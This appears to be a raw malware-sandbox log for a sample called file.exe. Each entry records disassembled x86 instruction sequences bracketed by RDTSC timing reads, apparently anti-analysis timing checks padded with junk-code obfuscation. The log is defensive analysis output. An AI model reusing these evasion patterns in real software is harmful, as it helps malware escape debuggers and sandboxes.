Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88125C second address: 8812D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F81D5048958h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 movsx edi, cx 0x00000025 push 00000000h 0x00000027 stc 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F81D5048958h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D2B72h] 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c jmp 00007F81D5048965h 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 881C5A second address: 881C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 881C5E second address: 881CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F81D5048960h 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F81D5048958h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a jng 00007F81D504895Ch 0x00000030 mov esi, dword ptr [ebp+122D29AEh] 0x00000036 push 00000000h 0x00000038 cld 0x00000039 push 00000000h 0x0000003b mov di, E03Ah 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 881CBA second address: 881CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882D24 second address: 882D2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F81D5048956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882468 second address: 882486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC65h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882D2E second address: 882D38 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F81D504895Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882486 second address: 88248A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882D38 second address: 882D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F81D504895Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88248A second address: 8824B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F81D4B5DC5Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882D4D second address: 882D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F81D5048966h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 883711 second address: 883752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F81D4B5DC58h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 or dword ptr [ebp+1246C39Fh], edx 0x0000002c push 00000000h 0x0000002e mov esi, dword ptr [ebp+1246C39Fh] 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007F81D4B5DC56h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 883521 second address: 883534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F81D504895Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88417D second address: 884181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 884B3A second address: 884B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88616E second address: 8861C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F81D4B5DC58h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov esi, dword ptr [ebp+122D2ABEh] 0x00000029 movsx esi, cx 0x0000002c push 00000000h 0x0000002e jmp 00007F81D4B5DC5Ah 0x00000033 push 00000000h 0x00000035 mov esi, edx 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 jnc 00007F81D4B5DC5Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8861C4 second address: 8861C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBAC second address: 88BBB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBB1 second address: 88BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBB7 second address: 88BBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBC4 second address: 88BBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBCA second address: 88BBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BBCF second address: 88BC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b stc 0x0000000c pop edi 0x0000000d push 00000000h 0x0000000f sbb bh, 00000036h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F81D5048958h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e jmp 00007F81D5048962h 0x00000033 jmp 00007F81D5048960h 0x00000038 push eax 0x00000039 jo 00007F81D5048976h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BC39 second address: 88BC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88CD3D second address: 88CDC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048965h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F81D504895Bh 0x0000000f nop 0x00000010 xor dword ptr [ebp+122D2C99h], edx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F81D5048958h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr [ebp+124539A2h], eax 0x00000038 jmp 00007F81D504895Fh 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D1D67h], esi 0x00000045 xchg eax, esi 0x00000046 jmp 00007F81D5048965h 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88CDC5 second address: 88CDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BE1D second address: 88BE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BE21 second address: 88BE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F81D4B5DC56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BE2F second address: 88BE5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F81D5048969h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BE5F second address: 88BE64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88DCC5 second address: 88DCD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88DCD9 second address: 88DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88ED22 second address: 88ED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F81D5048958h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 jmp 00007F81D5048965h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 891CA7 second address: 891CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 891CAB second address: 891CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890DD8 second address: 890DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 891CAF second address: 891D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F81D5048958h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 sbb bx, FFA4h 0x00000029 jnl 00007F81D504895Ch 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F81D5048958h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov edi, dword ptr [ebp+122D35ADh] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F81D5048964h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890DDC second address: 890DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F81D4B5DC63h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 891D2C second address: 891D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890DF7 second address: 890DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893C6D second address: 893C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893C72 second address: 893C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F81D4B5DC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 892E6F second address: 892E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893C7C second address: 893C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 892E74 second address: 892E7E instructions: 0x00000000 rdtsc 0x00000002 js 00007F81D504895Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893C8C second address: 893C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 896D63 second address: 896D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jmp 00007F81D5048968h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8982D4 second address: 8982EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F81D4B5DC5Bh 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 894E39 second address: 894E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 897583 second address: 897587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 894E3D second address: 894EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov bl, dh 0x0000000d je 00007F81D504895Ch 0x00000013 mov dword ptr [ebp+122D2EBCh], ebx 0x00000019 popad 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov ebx, eax 0x00000023 push eax 0x00000024 jno 00007F81D5048958h 0x0000002a pop ebx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 add dword ptr [ebp+122D3582h], eax 0x00000038 mov eax, dword ptr [ebp+122D0B49h] 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F81D5048958h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 mov bx, dx 0x0000005b mov ebx, dword ptr [ebp+1245A2B3h] 0x00000061 push FFFFFFFFh 0x00000063 mov edi, esi 0x00000065 nop 0x00000066 pushad 0x00000067 jmp 00007F81D5048962h 0x0000006c push eax 0x0000006d push edx 0x0000006e push edi 0x0000006f pop edi 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 894EC5 second address: 894EDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D4B5DC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnc 00007F81D4B5DC56h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A36B9 second address: 8A36DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F81D5048956h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F81D5048963h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DC8 second address: 8A2DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jc 00007F81D4B5DC56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DD7 second address: 8A2DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DDB second address: 8A2DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DE1 second address: 8A2DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DE7 second address: 8A2DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F81D4B5DC5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2DFA second address: 8A2DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2F39 second address: 8A2F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F81D4B5DC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F81D4B5DC64h 0x00000013 jmp 00007F81D4B5DC5Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A2F65 second address: 8A2F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F81D5048956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A322F second address: 8A324C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F81D4B5DC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F81D4B5DC5Ch 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A324C second address: 8A325D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F81D5048956h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A325D second address: 8A3261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A3261 second address: 8A3265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A3265 second address: 8A3279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F81D4B5DC56h 0x0000000e jg 00007F81D4B5DC56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A3279 second address: 8A327D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A958B second address: 8A9595 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F81D4B5DC5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE6CE second address: 8AE6D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE6D4 second address: 8AE6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE6DE second address: 8AE6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F81D5048956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83CA0D second address: 83CA13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83CA13 second address: 83CA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F81D5048968h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83CA3A second address: 83CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ADB67 second address: 8ADB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F81D5048956h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE144 second address: 8AE16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC67h 0x00000009 popad 0x0000000a jne 00007F81D4B5DC5Eh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE2D3 second address: 8AE2DD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F81D5048956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8AE2DD second address: 8AE2E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B3776 second address: 8B378B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B378B second address: 8B3793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B25B7 second address: 8B25CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048963h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B25CE second address: 8B25DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F81D4B5DC62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8B25DC second address: 8B25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
